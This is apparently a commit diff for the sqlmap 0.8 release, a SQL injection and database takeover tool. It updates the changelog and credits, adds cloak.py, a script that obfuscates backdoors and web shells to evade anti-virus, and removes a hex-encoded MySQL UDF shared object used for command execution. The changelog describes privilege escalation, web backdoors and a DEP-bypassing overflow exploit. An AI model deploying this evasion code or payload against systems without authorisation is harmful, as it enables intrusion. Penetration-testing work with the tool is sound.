sqlmap 0.8 stable!

1. there's kitrap0d (MS10-015) which is far more reliable, just recently fixed
2. works only to priv esc basically on MSSQL when it runs as NETWORK SERVICE and the machine is not patched against MS09-012 which is "rare" (hopefully) nowadays.
Now sqlmap relies on kitrap0d and incognito to privilege escalate the database process' user privileges to SYSTEM, both via Meterpreter.

Minor layout adjustments.

doc/AUTHORS

@@ -1,3 +1,7 @@
-Bernardo Damele A. G. (inquis) - Lead developer
+Bernardo Damele Assumpcao Guimaraes (inquis) - Lead developer
 <bernardo.damele@gmail.com>
 PGP Key ID: 0x05F5A30F
+
+Miroslav Stampar (stamparm) - Developer since version 0.8-rc2
+<miroslav.stampar@gmail.com>
+PGP Key ID: 0xB5397B1B

doc/ChangeLog

@@ -1,3 +1,115 @@
+sqlmap (0.8-1) stable; urgency=low
+
+  * Support to enumerate and dump all databases' tables containing user
+    provided column(s) by specifying for instance '--dump -C user,pass'.
+    Useful to identify for instance tables containing custom application
+    credentials (Bernardo).
+  * Support to parse -C (column name(s)) when fetching
+    columns of a table with --columns: it will enumerate only columns like
+    the provided one(s) within the specified table (Bernardo).
+  * Support for takeover features on PostgreSQL 8.4 (Bernardo).
+  * Enhanced --priv-esc to rely on new Metasploit Meterpreter's
+    'getsystem' command to elevate privileges of the user running the
+    back-end DBMS instance to SYSTEM on Windows (Bernardo).
+  * Automatic support in --os-pwn to use the web uploader/backdoor to
+    upload and execute the Metasploit payload stager when stacked queries
+    SQL injection is not supported, for instance on MySQL/PHP and
+    MySQL/ASP, but there is a writable folder within the web server
+    document root (Bernardo and Miroslav).
+  * Fixed web backdoor functionality for --os-cmd, --os-shell and --os-pwn
+    useful when web application does not support stacked queries (Bernardo).
+  * Added support to properly read (--read-file) also binary files via
+    PostgreSQL by injecting sqlmap new sys_fileread() user-defined
+    function (Bernardo and Miroslav).
+  * Updated active fingerprint and comment injection fingerprint for
+    MySQL 5.1, MySQL 5.4 and MySQL 5.5 (Bernardo).
+  * Updated active fingerprint for PostgreSQL 8.4 (Bernardo).
+  * Support for NTLM authentication via python-ntlm third party library,
+    http://code.google.com/p/python-ntlm/, --auth-type NTLM (Bernardo).
+  * Support to automatically decode deflate, gzip and x-gzip HTTP
+    responses (Miroslav).
+  * Support for Certificate authentication, --auth-cert option added
+    (Miroslav).
+  * Added support for regular expression based scope when parsing Burp or
+    Web Scarab proxy log file (-l), --scope (Miroslav).
+  * Added option (-r) to load a single HTTP request from a text file
+    (Miroslav).
+  * Added option (--ignore-proxy) to ignore system default HTTP proxy
+    (Miroslav).
+  * Added support to ignore Set-Cookie in HTTP responses,
+    --drop-set-cookie (Miroslav).
+  * Added support to specify which Google dork result page to parse,
+    --gpage to be used together with -g (Miroslav).
+  * Major bug fix and enhancements to the multi-threading (--threads)
+    functionality (Miroslav).
+  * Fixed URL encoding/decoding of GET/POST parameters and Cookie header
+    (Miroslav).
+  * Refactored --update to use python-svn third party library if available
+    or 'svn' command to update sqlmap to the latest development version
+    from subversion repository (Bernardo and Miroslav).
+  * Major bugs fixed (Bernardo and Miroslav).
+  * Cleanup of UDF source code repository,
+    https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack (Bernardo
+    and Miroslav).
+  * Major code cleanup (Miroslav).
+  * Added simple file encryption/compression utility, extra/cloak/cloak.py,
+    used by sqlmap to decrypt on the fly Churrasco, UPX executable and web
+    shells consequently reducing drastically the number of anti-virus
+    softwares that mistakenly mark sqlmap as a malware (Miroslav).
+  * Updated user's manual (Bernardo and Miroslav).
+  * Created several demo videos, hosted on YouTube
+    (http://www.youtube.com/user/inquisb) and linked from
+    http://sqlmap.sourceforge.net/demo.html (Bernardo).
+
+ -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun, 14 Mar 2010 10:00:00 +0000
+
+sqlmap (0.8rc1-1) stable; urgency=low
+
+  * Major enhancement to the Microsoft SQL Server stored procedure
+    heap-based buffer overflow exploit (--os-bof) to automatically bypass
+    DEP memory protection.
+  * Added support for MySQL and PostgreSQL to execute Metasploit shellcode
+    via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an
+    option instead of uploading the standalone payload stager executable.
+  * Added options for MySQL, PostgreSQL and Microsoft SQL Server to
+    read/add/delete Windows registry keys.
+  * Added options for MySQL and PostgreSQL to inject custom user-defined
+    functions.
+  * Added support for --first and --last so the user now has even more
+    granularity in what to enumerate in the query output.
+  * Minor enhancement to save the session by default in
+    'output/hostname/session' file if -s option is not specified.
+  * Minor improvement to automatically remove sqlmap created temporary
+    files from the DBMS underlying file system.
+  * Minor bugs fixed.
+  * Major code refactoring.
+
+ -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Mon, 21 Sep 2009 15:00:00 +0000
+
+sqlmap (0.7-1) stable; urgency=low
+
+  * Adapted Metasploit wrapping functions to work with latest 3.3
+    development version too.
+  * Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
+  * Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or
+    --os-bof is selected) when running under Windows because msfconsole
+    and msfcli are not supported on the native Windows Ruby interpreter.
+    This make sqlmap 0.7 to work again on Windows too.
+  * Minor improvement so that sqlmap tests also all parameters with no
+    value (eg. par=).
+  * HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and
+    2.6+.
+  * Major bug fix to sql-query/sql-shell features.
+  * Major bug fix in --read-file option.
+  * Major silent bug fix to multi-threading functionality.
+  * Fixed the web backdoor functionality (for MySQL) when (usually) stacked
+    queries are not supported and --os-shell is provided.
+  * Fixed MySQL 'comment injection' version fingerprint.
+  * Fixed basic Microsoft SQL Server 2000 fingerprint.
+  * Many minor bug fixes and code refactoring.
+
+ -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sat, 25 Jul 2009 10:00:00 +0000
+
 sqlmap (0.7rc1-1) stable; urgency=low
 
   * Added support to execute arbitrary commands on the database server

doc/THANKS

@@ -1,31 +1,55 @@
 == Individuals ==
 
+David Alvarez <david.alvarez.s@gmail.com>
+    for reporting a bug
+
 Chip Andrews <chip@sqlsecurity.com>
     for his excellent work maintaining the SQL Server versions database
     at SQLSecurity.com and permission to implement the update feature
     taking data from his site
 
+Otavio Augusto <otavioarj@gmail.com>
+    for reporting a minor bug
+
+Simon Baker <simonb@sec-1.com>
+    for reporting some bugs
+
 Daniele Bellucci <daniele.bellucci@gmail.com>
     for starting sqlmap project and developing it between July and August
     2006
 
+Velky Brat <velkybrat@gmail.com>
+    for suggesting a minor enhancement to the bisection algorithm
+
 Jack Butler <fattredd@hotmail.com>
     for providing me with the sqlmap site favicon
 
+Roberto Castrogiovanni <castrogiovanni.roberto@gmail.com>
+    for reporting a minor bug
+
 Cesar Cerrudo <cesar@argeniss.com>
     for his Windows access token kidnapping tool Churrasco included in
     sqlmap tree as a contrib library and used to run the stand-alone
     payload stager on the target Windows machine as SYSTEM user if the
     user wants to perform a privilege escalation attack,
-    http://www.argeniss.com/research/Churrasco.zip
+    http://www.argeniss.com/research/TokenKidnapping.pdf
 
 Karl Chen <quarl@cs.berkeley.edu>
     for providing with the multithreading patch for the inference
     algorithm
 
-Pierre Chifflier <pollux@debian.org>
-    for uploading the sqlmap 0.6.2 Debian package to the official Debian
-    project repository
+Y P Chien <ypchien@cox.net>
+    for reporting a minor bug
+
+Pierre Chifflier <pollux@debian.org> and Mark Hymers <ftpmaster@debian.org>
+    for uploading and accepting the sqlmap Debian package to the official
+    Debian project repository
+
+Ulises U. Cune <ulises2k@gmail.com>
+    for reporting a bug
+
+Alessandro Curio <alessandro.curio@gmail.com>
+    for reporting a minor bug
 
 Stefano Di Paola <stefano.dipaola@wisec.it>
     for suggesting good features
@@ -38,6 +62,11 @@ Dan Guido <dguido@gmail.com>
 Adam Faheem <faheem.adam@is.co.za>
     for reporting a few bugs
 
+James Fisher <www@sittinglittleduck.com>
+    for providing me with two very good feature requests
+    for his great tool too brute force directories and files names on
+    web/application servers, Dir Buster, http://tinyurl.com/dirbuster
+
 Jim Forster <jimforster@goldenwest.com>
     for reporting a bug
 
@@ -49,14 +78,24 @@ Giorgio Fedon <giorgio.fedon@gmail.com>
     for suggesting a speed improvement for bisection algorithm
     for reporting a bug when running against Microsoft SQL Server 2005
 
+Kasper Fons <thefeds@mail.dk>
+    for reporting a bug
+
 Alan Franzoni <alan.franzoni@gmail.com>
     for helping me out with Python subprocess library
 
+Daniel G. Gamonal <lgrecol@gmail.com>
+    for reporting a minor bug
+
 Ivan Giacomelli <truemilk@insiberia.net>
     for reporting a bug
     for suggesting a minor enhancement
     for reviewing the documentation
 
+Oliver Gruskovnjak <oliver.gruskovnjak@gmail.com>
+    for reporting a bug
+    for providing me with a minor patch
+
 Davide Guerri <d.guerri@caspur.it>
     for suggesting an enhancement
 
@@ -71,26 +110,52 @@ Will Holcomb <wholcomb@gmail.com>
     for his MultipartPostHandler class to handle multipart POST forms and
     permission to include it within sqlmap source code
 
+Daniel Huckmann <sanitybit@gmail.com>
+    for reporting a couple of bugs
+
+Mounir Idrassi <mounir.idrassi@idrix.net>
+    for his compiled version of UPX for Mac OS X
+
+Dirk Jagdmann <doj@cubic.org>
+    for reporting a typo in the documentation
+
 Luke Jahnke <luke.jahnke@gmail.com>
     for reporting a bug when running against MySQL < 5.0
 
+Sven Klemm <sven@c3d2.de>
+    for reporting two minor bugs with PostgreSQL
+
 Anant Kochhar <anant.kochhar@secureyes.net>
     for providing me with feedback on the user's manual
 
 Alexander Kornbrust <ak@red-database-security.com>
     for reporting a couple of bugs
 
+Krzysztof Kotowicz <kkotowicz@gmail.com>
+    for reporting a minor bug
+
+Nicolas Krassas <krasn@ans.gr>
+    for reporting a bug
+
 Guido Landi <lists@keamera.org>
+    for reporting a couple of bugs
     for the great technical discussions
     for Microsoft SQL Server 2000 and Microsoft SQL Server 2005
     'sp_replwritetovarbin' stored procedure heap-based buffer overflow
-    (MS09-004) exploit development, http://www.milw0rm.com/author/1413
+    (MS09-004) exploit development
+    for presenting with me at SOURCE Conference 2009 in Barcelona (Spain)
+    on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on
+    November 20, 2009
+
+Lee Lawson <Lee.Lawson@dns.co.uk>
+    for reporting a minor bug
 
 Nico Leidecker <nico@leidecker.info>
     for providing me with feedback on a few features
+    for reporting a couple of bugs
 
 Gabriel Lima <pato@bugnet.com.br>
-    for reporting a bug
+    for reporting a couple of bugs
 
 Pavol Luptak <pavol.luptak@nethemba.com>
     for reporting a bug when injecting on a POST data parameter
@@ -119,9 +184,16 @@ John F. Reiser <sales@bitwagon.com>
     Metasploit Framework 3 payload stager portable executable,
     http://upx.sourceforge.net
 
+Simone Onofri <simone.onofri@gmail.com>
+    for patching the PHP web backdoor to make it work properly also on
+    Windows
+
 Antonio Parata <s4tan@ictsc.it>
     for providing me with some ideas for the PHP backdoor
 
+Adrian Pastor <ap@gnucitizen.org>
+    for donating to sqlmap development
+
 Chris Patten <cpatten@sunera.com>
     for reporting a bug in the blind SQL injection bisection algorithm
 
@@ -199,7 +271,7 @@ Bedirhan Urgun <bedirhanurgun@gmail.com>
     for benchmarking sqlmap in the context of his SQL injection
     benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench
 
-Kyprianos Vassilopoulos <kyprianos.vasilopoulos@gmail.com>
+Kyprianos Vasilopoulos <kyprianos.vasilopoulos@gmail.com>
     for reporting an unhandled connection exception
 
 Anthony Zboralski <anthony.zboralski@bellua.com>
@@ -207,12 +279,21 @@ Anthony Zboralski <anthony.zboralski@bellua.com>
     for reporting a few minor bugs
     for donating to sqlmap development
 
+dsu <dsu@dsu.com.ua>
+    for reporting a bug
+
 fufuh <fufuh@users.sourceforge.net>
     for reporting a bug when running on Windows
 
 mariano <marianoso@gmail.com>
     for reporting a bug
 
+pacman730 <pacman730@users.sourceforge.net>
+    for reporting a bug
+
+Stuffe <stuffe.dk@gmail.com>
+    for reporting a minor bug and a feature request
+
 Sylphid <sylphid.su@sti.com.tw>
     for suggesting some features
 

extra/__init__.py

@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass

extra/cloak/README.txt

@@ -0,0 +1,22 @@
+To use cloak.py you need to pass it the original file,
+and optionally the output file name.
+
+Example:
+
+$ python ./cloak.py -i backdoor.asp -o backdoor.asp_
+
+This will create an encrypted and compressed binary file backdoor.asp_.
+
+Such file can then be converted to its original form by using the -d
+functionality of the cloak.py program:
+
+$ python ./cloak.py -d -i backdoor.asp_ -o backdoor.asp
+
+If you skip the output file name, general rule is that the compressed
+file names are suffixed with the character '_', while the original is
+get by skipping the last character. So, that means that the upper
+examples can also be written in the following form:
+
+$ python ./cloak.py -i backdoor.asp
+
+$ python ./cloak.py -d -i backdoor.asp_

extra/cloak/__init__.py

@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass

extra/cloak/cloak.py

@@ -0,0 +1,93 @@
+#!/usr/bin/env python
+
+"""
+cloak.py - Simple file encryption/compression utility
+Copyright (C) 2010  Miroslav Stampar, Bernardo Damele A. G.
+email(s): miroslav.stampar@gmail.com, bernardo.damele@gmail.com
+
+This library is free software; you can redistribute it and/or
+modify it under the terms of the GNU Lesser General Public
+License as published by the Free Software Foundation; either
+version 2.1 of the License, or (at your option) any later version.
+
+This library is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+Lesser General Public License for more details.
+
+You should have received a copy of the GNU Lesser General Public
+License along with this library; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import bz2
+import os
+import sys
+
+from optparse import OptionError
+from optparse import OptionParser
+
+def hideAscii(data):
+    retVal = ""
+    for i in xrange(len(data)):
+        if ord(data[i]) < 128:
+            retVal += chr(ord(data[i]) ^ 127)
+        else:
+            retVal += data[i]
+            
+    return retVal
+
+def cloak(inputFile):
+    f = open(inputFile, 'rb')
+    data = bz2.compress(f.read())
+    f.close()
+    
+    return hideAscii(data)
+        
+def decloak(inputFile):
+    f = open(inputFile, 'rb')
+    data = bz2.decompress(hideAscii(f.read()))
+    f.close()
+    
+    return data
+
+def main():
+    usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
+    parser  = OptionParser(usage=usage, version='0.1')
+
+    try:
+        parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
+        parser.add_option('-i', dest='inputFile', help='Input file')
+        parser.add_option('-o', dest='outputFile', help='Output file')
+
+        (args, _) = parser.parse_args()
+
+        if not args.inputFile:
+            parser.error('Missing the input file, -h for help')
+
+    except (OptionError, TypeError), e:
+        parser.error(e)
+    
+    if not os.path.isfile(args.inputFile):
+        print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile
+        sys.exit(1)
+    
+    if not args.decrypt:
+        data = cloak(args.inputFile)
+    else:
+        data = decloak(args.inputFile)
+
+    if not args.outputFile:
+        if not args.decrypt:
+            args.outputFile = args.inputFile + '_'
+        else:
+            args.outputFile = args.inputFile[:-1]
+        
+    fpOut      = open(args.outputFile, 'wb')
+    sys.stdout = fpOut
+    sys.stdout.write(data)
+    sys.stdout.close()
+
+
+if __name__ == '__main__':
+    main()

extra/dbgtool/README.txt

@@ -18,7 +18,3 @@ To be able to execute it on Windows you have to rename it to end with
 '.com' or '.exe':
 
 > ren nc_exe nc.exe
-
-
-Happy hacking!
-Bernardo Damele A. G. <bernardo.damele@gmail.com>

extra/dbgtool/dbgtool.py

@@ -2,7 +2,7 @@
 
 """
 dbgtool.py - Portable executable to ASCII debug script converter
-Copyright (C) 2009  Bernardo Damele A. G.
+Copyright (C) 2009-2010  Bernardo Damele A. G.
 web: http://bernardodamele.blogspot.com/
 email: bernardo.damele@gmail.com
 
@@ -21,8 +21,6 @@ License along with this library; if not, write to the Free Software
 Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import os
 import sys
 import struct
@@ -30,7 +28,6 @@ import struct
 from optparse import OptionError
 from optparse import OptionParser
 
-
 def convert(inputFile):
     fileStat = os.stat(inputFile)
     fileSize = fileStat.st_size
@@ -74,7 +71,6 @@ def convert(inputFile):
 
     return script
         
-
 def main(inputFile, outputFile):
     if not os.path.isfile(inputFile):
         print 'ERROR: the provided input file \'%s\' is not a regular file' % inputFile
@@ -90,7 +86,6 @@ def main(inputFile, outputFile):
     else:
         print script
         
-
 if __name__ == '__main__':
     usage = '%s -i <input file> [-o <output file>]' % sys.argv[0]
     parser  = OptionParser(usage=usage, version='0.1')

extra/msfauxmod/README.txt

@@ -76,7 +76,3 @@ SQLMAP: [*] shutting down at: 16:23:21
 SQLMAP: 
 [*] Auxiliary module execution completed
 msf auxiliary(wmap_sqlmap) > 
-
-
-Happy hacking!
-Bernardo Damele A. G. <bernardo.damele@gmail.com>

extra/mysqludfsys/command_execution/linux.sql

@@ -1,119 +0,0 @@
--- Notes:
--- 
--- The SO compiled using MySQL 5.0.67 C libraries works also on MySQL
--- 5.1.30 and MySQL 4.1.22 (TODO: confirm)
--- 
--- SO compiled using MySQL 5.1.30 C libraries
--- lib_mysqludf_sys.so: 12896 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, not stripped)
--- lib_mysqludf_sys.so: 5476 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped)
--- 
--- Little hack to compress the shared object:
--- * Compile with -O1 the shared object
--- * Use strip to remove all symbols (-s) and non-global symbols (-x)
-
-
--- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data blob);
-
-
--- Insert the hexadecimal encoded UDF in the table
--- 
--- SO compiled using MySQL 5.1.30 C libraries
-INSERT INTO udftest(data) VALUE (0x7f454c46010101000000000000000000030003000100000010080000340000007c1100000000000034002000050028001900180001000000000000000000000000000000bc0e0000bc0e0000050000000010000001000000040f0000041f0000041f00000801000010010000060000000010000002000000180f0000181f0000181f0000d0000000d0000000060000000400000051e574640000000000000000000000000000000000000000060000000400000052e57464040f0000041f0000041f0000fc000000fc00000004000000010000001100000024000000000000000d00000000000000030000001a00000000000000070000001b0000000a000000140000000f000000150000000c0000000e0000001e000000060000001c000000000000000000000000000000010000000000000000000000020000000400000000000000230000002200000000000000130000001d000000170000000b000000000000000000000005000000090000002100000011000000000000001800000020000000080000001f0000000000000010000000000000001900000000000000160000000000000012000000000000001100000010000000040000000700000001080440801946c99ca40803900460831000000012000000130000001500000016000000180000001b0000001d0000000000);
-UPDATE udftest SET data=CONCAT(data,0x00001e000000000000001f0000002000000021000000220000002300000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed971581ca868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff3b9fd4a0ad73d1c50b5911feab5fbe12000000000000000000000000000000009500000000000000000000001200000001000000000000000000000020000000250000000000000000000000200000009b0000000000000000000000120000007201000000000000000000001200000039010000000000000000000012000000a3000000000000000000000012000000ab00000000000000000000001200000065010000000000000000000012000000480100000000000000000000120000008e000000000000000000000012000000b8000000000000000000000012000000160000000000000000000000220000004f010000000000000000000012000000b1000000000000000000000012000000400100006a0d00008b00000012000b0075000000db0800000500000012000b0010000000980e00000000000012000c00ff0000008d0c00004b00000012000b00df000000ac07000000000000120009008a0100000c200000000000001000f1ff300100004d0d00001d00000012000b009601000014200000000000001000f1ff);
-UPDATE udftest SET data=CONCAT(data,0x56000000d10800000500000012000b00c90000001f0a00007300000012000b006a0100000f0e00004500000012000b0039000000cc0800000500000012000b00f2000000140c00007900000012000b00830100000c200000000000001000f1ff65000000d60800000500000012000b00e5000000050b00000f01000012000b00d7000000920a00007300000012000b0015010000d80c00007500000012000b0056010000f50d00001a00000012000b0085000000e00800003f01000012000b00005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f63007374726e6370790066676574730070636c6f7365005f5f737461636b5f63686b5f6661696c007379735f6576616c5f696e6974007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379);
-UPDATE udftest SET data=CONCAT(data,0x735f657865630073797374656d007379735f736574006d656d63707900736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e3300474c4942435f322e3400474c4942435f322e3000474c4942435f322e310000000002000000000003000300030003000300030003000300040005000300020001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000400790100001000000000000000731f6909000005009b010000100000001469690d00000400a7010000100000001069690d00000300b1010000100000001169690d00000200bb010000000000001e09000008000000082000000800000014090000020b0000c50b0000020b00002b090000020100006a090000020400008b09000002070000b109000002080000c3090000020f0000100a0000020c00005f0d0000020600009c0d0000020a0000c10d0000020a0000df0d0000020e0000090e000002090000220e000002050000e81f000006020000ec1f000006030000f01f0000060d0000002000000702000004200000070d00005589e55383ec04e8000000005b81c33c1800008b93f4ffffff85d274);
-UPDATE udftest SET data=CONCAT(data,0x05e81e000000e8bd000000e888060000585bc9c3ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffffffffa3100000006808000000e9d0ffffff000000005589e55653e8ad00000081c3da17000083ec1080bb1800000000755d8b83fcffffff85c0740e8b8314000000890424e8b8ffffff8b8b1c0000008d831cffffff8d9318ffffff29d0c1f8028d70ff39f173208db6000000008d410189831c000000ff948318ffffff8b8b1c00000039f172e6c683180000000183c4105b5e5dc35589e553e82e00000081c35b17000083ec048b9320ffffff85d274158b93f8ffffff85d2740b8d8320ffffff890424ffd283c4045b5dc38b1c24c3905589e55dc35589e55dc35589e55dc35589e55dc35589e557565381ec2c0400008b5d0c8b45148985d8fbffff8b55188995d4fbffff65a1140000008945f031c0c7042401000000e8fcffffff89c6c7442404b40e00008b43088b00890424e8fcffffff8985dcfbffffc785e0fbffff00000000eb548dbdf0fbffffb800000000b9fffffffff2ae89c8f7d08d78ff8b9de0fbffff01fb895c2404893424e8fcffffff89c6897c24088d95f0fbffff895424048b95e0fbffff8d0410890424e8fcffffff899de0fbffff8b85dcfbffff89442408c7442404000400008d95f0fbffff891424e8fcffffff85c075888b);
-UPDATE udftest SET data=CONCAT(data,0x85dcfbffff890424e8fcffffff803e00740485f6750b8b95d4fbffffc60201eb268b85e0fbffffc64406ff0089f7b800000000b9fffffffff2aef7d183e9018b95d8fbffff890a89f08b55f0653315140000007405e8fcffffff81c42c0400005b5e5f5dc35589e58b450c8b5510833801750d8b4004b9000000008338007454c70245787065c7420463746564c7420820657861c7420c63746c79c74210206f6e65c7421420737472c74218696e6720c7421c74797065c7422020706172c74224616d657466c742286572c6422a00b90100000089c85dc35589e58b450c8b5510833801750d8b4004b9000000008338007454c70245787065c7420463746564c7420820657861c7420c63746c79c74210206f6e65c7421420737472c74218696e6720c7421c74797065c7422020706172c74224616d657466c742286572c6422a00b90100000089c85dc35589e55383ec048b550c8b5d10833a027444c70345787065c7430463746564c7430820657861c7430c63746c79c743102074776fc7431420617267c74318756d656e66c7431c7473c6431e00ba01000000e9b10000008b4204833800744cc70345787065c7430463746564c7430820737472c7430c696e6720c7431074797065c7431420666f72c74318206e616dc7431c65207061c7432072616d65c7432474657200ba010000);
-UPDATE udftest SET data=CONCAT(data,0x00eb5dc74004000000008b520c8b0283c002034204890424e8fcffffff8b550889420cba0000000085c07534c703436f756cc7430464206e6fc743087420616cc7430c6c6f6361c743107465206dc74314656d6f7266c743187900ba0100000089d083c4045b5dc35589e58b450c8b551083380175158b4004833800750d8b4508c60001b800000000eb54c70245787065c7420463746564c7420820657861c7420c63746c79c74210206f6e65c7421420737472c74218696e6720c7421c74797065c7422020706172c74224616d657466c742286572c6422a00b8010000005dc35589e58b4510c7006c69625fc740046d797371c740086c756466c7400c5f737973c7401020766572c7401473696f6ec7401820302e3066c7401c2e33c6401e008b5514c7021e0000005dc35589e58b5510b9000000008b450c833800745ec7024e6f2061c742047267756dc74208656e7473c7420c20616c6cc742106f776564c7421420287564c74218663a206cc7421c69625f6dc742207973716cc742247564665fc742287379735fc7422c696e666f66c742302900b90100000089c85dc35589e583ec088b450c8b40088b00890424e8fcffffff89c2c1fa1fc9c35589e583ec18895df48975f8897dfc8b5d0c8b45088b700c8b430c8b108d7c16018b43088b008954240889442404893424e8fcff);
-UPDATE udftest SET data=CONCAT(data,0xffff8b430c8b00c60406008b530c8b43088b48048b420489442408894c2404893c24e8fcffffff8b430c8b4004c6040700c744240801000000897c2404893424e8fcffffff89c2c1fa1f8b5df48b75f88b7dfc89ec5dc35589e583ec088b45088b400c85c07408890424e8fcffffffc9c35589e55783ec048b450c8b40088b00890424e8fcffffff89c285c075088b4518c60001eb1889c7b800000000b9fffffffff2aef7d183e9018b4514890889d083c4045f5dc39090909090909090909090905589e55653e85dfaffff81c38a1100008b8310ffffff83f8ff74198db310ffffff8db4260000000083ee04ffd08b0683f8ff75f45b5e5dc35589e55383ec04e8000000005b81c350110000e860f9ffff595bc9c37200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000ffffffff000000000000000001000000790100000c000000ac0700000d000000980e000004000000d4000000f5feff6fb001000005000000a404000006000000640200000a000000c50100000b0000001000000003000000f41f000002000000100000001400000011000000170000009c07000011000000040700001200000098000000);
-UPDATE udftest SET data=CONCAT(data,0x13000000080000001600000000000000feffff6fb4060000ffffff6f01000000f0ffff6f6a060000faffff6f0200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000181f00000000000000000000f20700000208000008200000004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e74000000000000000000);
-UPDATE udftest SET data=CONCAT(data,0x000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000d4000000d4000000dc000000030000000000000004000000040000000b000000f6ffff6f02000000b0010000b0010000b400000003000000000000000400000004000000150000000b00000002000000640200006402000040020000040000000100000004000000100000001d0000000300000002000000a4040000a4040000c50100000000000000000000010000000000000025000000ffffff6f020000006a0600006a060000480000000300000000000000020000000200000032000000feffff6f02000000b4060000b40600005000000004000000010000000400000000000000410000000900000002000000040700000407000098000000030000000000000004000000080000004a00000009000000020000009c0700009c07000010000000030000000a0000000400000008000000530000000100000006000000ac070000ac07000030000000000000000000000004000000000000004e0000000100000006000000dc070000dc0700003000000000000000000000000400000004000000590000000100000006000000100800001008000088060000000000000000000010000000000000005f0000000100000006000000980e0000980e00001c000000);
-UPDATE udftest SET data=CONCAT(data,0x00000000000000000400000000000000650000000100000032000000b40e0000b40e000002000000000000000000000001000000010000006d0000000100000002000000b80e0000b80e00000400000000000000000000000400000000000000770000000100000003000000041f0000040f000008000000000000000000000004000000000000007e00000001000000030000000c1f00000c0f00000800000000000000000000000400000000000000850000000100000003000000141f0000140f000004000000000000000000000004000000000000008a0000000600000003000000181f0000180f0000d000000004000000000000000400000008000000930000000100000003000000e81f0000e80f00000c00000000000000000000000400000004000000980000000100000003000000f41f0000f40f00001400000000000000000000000400000004000000a1000000010000000300000008200000081000000400000000000000000000000400000000000000a700000008000000030000000c2000000c1000000800000000000000000000000400000000000000ac0000000100000000000000000000000c100000b90000000000000000000000010000000000000001000000030000000000000000000000c5100000b500000000000000000000000100000000000000);
-
-
